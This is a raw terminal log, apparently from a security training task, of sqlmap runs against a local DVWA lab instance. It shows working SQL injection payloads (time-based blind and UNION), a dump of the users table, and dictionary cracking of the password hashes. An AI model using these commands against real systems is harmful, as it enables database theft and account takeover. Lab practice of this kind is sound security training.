                                                                                                                                                                   
┌──(kali㉿kali)-[~/cyart_vapt_task4]
└─$ sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" \
  --cookie="security=low; PHPSESSID=5ce71629e270a98d64e2c8077bbe50fd" --dbs --batch                  
        ___
       __H__                                                                                                                                                          
 ___ ___[,]_____ ___ ___  {1.9.11#stable}                                                                                                                             
|_ -| . [(]     | .'| . |                                                                                                                                             
|___|_  [)]_|_|_|__,|  _|                                                                                                                                             
      |_|V...       |_|   https://sqlmap.org                                                                                                                          

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:32:36 /2025-12-03/

[00:32:36] [INFO] resuming back-end DBMS 'mysql' 
[00:32:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 3004 FROM (SELECT(SLEEP(5)))Rwht) AND 'GhEV'='GhEV&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7176627a71,0x6f634777585768686850535a6b4a6c6e624247746642546f485a5765515777626254675672796d47,0x7170706a71),NULL-- -&Submit=Submit
---
[00:32:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.65
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[00:32:37] [INFO] fetching database names
available databases [2]:
[*] dvwa
[*] information_schema

[00:32:37] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/127.0.0.1'

[*] ending @ 00:32:37 /2025-12-03/

                                                                                                                                                                      
┌──(kali㉿kali)-[~/cyart_vapt_task4]
└─$ sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" \
  --cookie="security=low; PHPSESSID=5ce71629e270a98d64e2c8077bbe50fd" -D dvwa -T users --dump --batch
        ___
       __H__                                                                                                                                                          
 ___ ___[(]_____ ___ ___  {1.9.11#stable}                                                                                                                             
|_ -| . [(]     | .'| . |                                                                                                                                             
|___|_  [.]_|_|_|__,|  _|                                                                                                                                             
      |_|V...       |_|   https://sqlmap.org                                                                                                                          

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:32:58 /2025-12-03/

[00:32:58] [INFO] resuming back-end DBMS 'mysql' 
[00:32:58] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 3004 FROM (SELECT(SLEEP(5)))Rwht) AND 'GhEV'='GhEV&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7176627a71,0x6f634777585768686850535a6b4a6c6e624247746642546f485a5765515777626254675672796d47,0x7170706a71),NULL-- -&Submit=Submit
---
[00:32:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.65
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[00:32:59] [INFO] fetching columns for table 'users' in database 'dvwa'
[00:32:59] [WARNING] reflective value(s) found and filtering out
[00:32:59] [INFO] fetching entries for table 'users' in database 'dvwa'
[00:33:00] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[00:33:00] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[00:33:00] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[00:33:00] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[00:33:00] [WARNING] multiprocessing hash cracking is currently not supported on this platform
[00:33:22] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'                                                                              
[00:33:37] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'                                                                             
[00:34:03] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'                                                                             
[00:34:16] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'                                                                            
Database: dvwa                                                                                                                                                       
Table: users
[5 entries]
+---------+--------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+-----------------+
| user_id | role   | user    | avatar                           | password                                    | last_name | first_name | last_login          | failed_login | account_enabled |
+---------+--------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+-----------------+
| 1       | admin  | admin   | /DVWA/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2025-11-21 03:44:08 | 0            | 1               |
| 2       | user   | gordonb | /DVWA/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2025-11-21 03:44:08 | 0            | 1               |
| 3       | user   | 1337    | /DVWA/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2025-11-21 03:44:08 | 0            | 1               |
| 4       | user   | pablo   | /DVWA/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2025-11-21 03:44:08 | 0            | 1               |
| 5       | user   | smithy  | /DVWA/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2025-11-21 03:44:08 | 0            | 1               |
+---------+--------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+-----------------+

[00:34:16] [INFO] table 'dvwa.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/127.0.0.1/dump/dvwa/users.csv'
[00:34:16] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/127.0.0.1'

[*] ending @ 00:34:16 /2025-12-03/

                                           
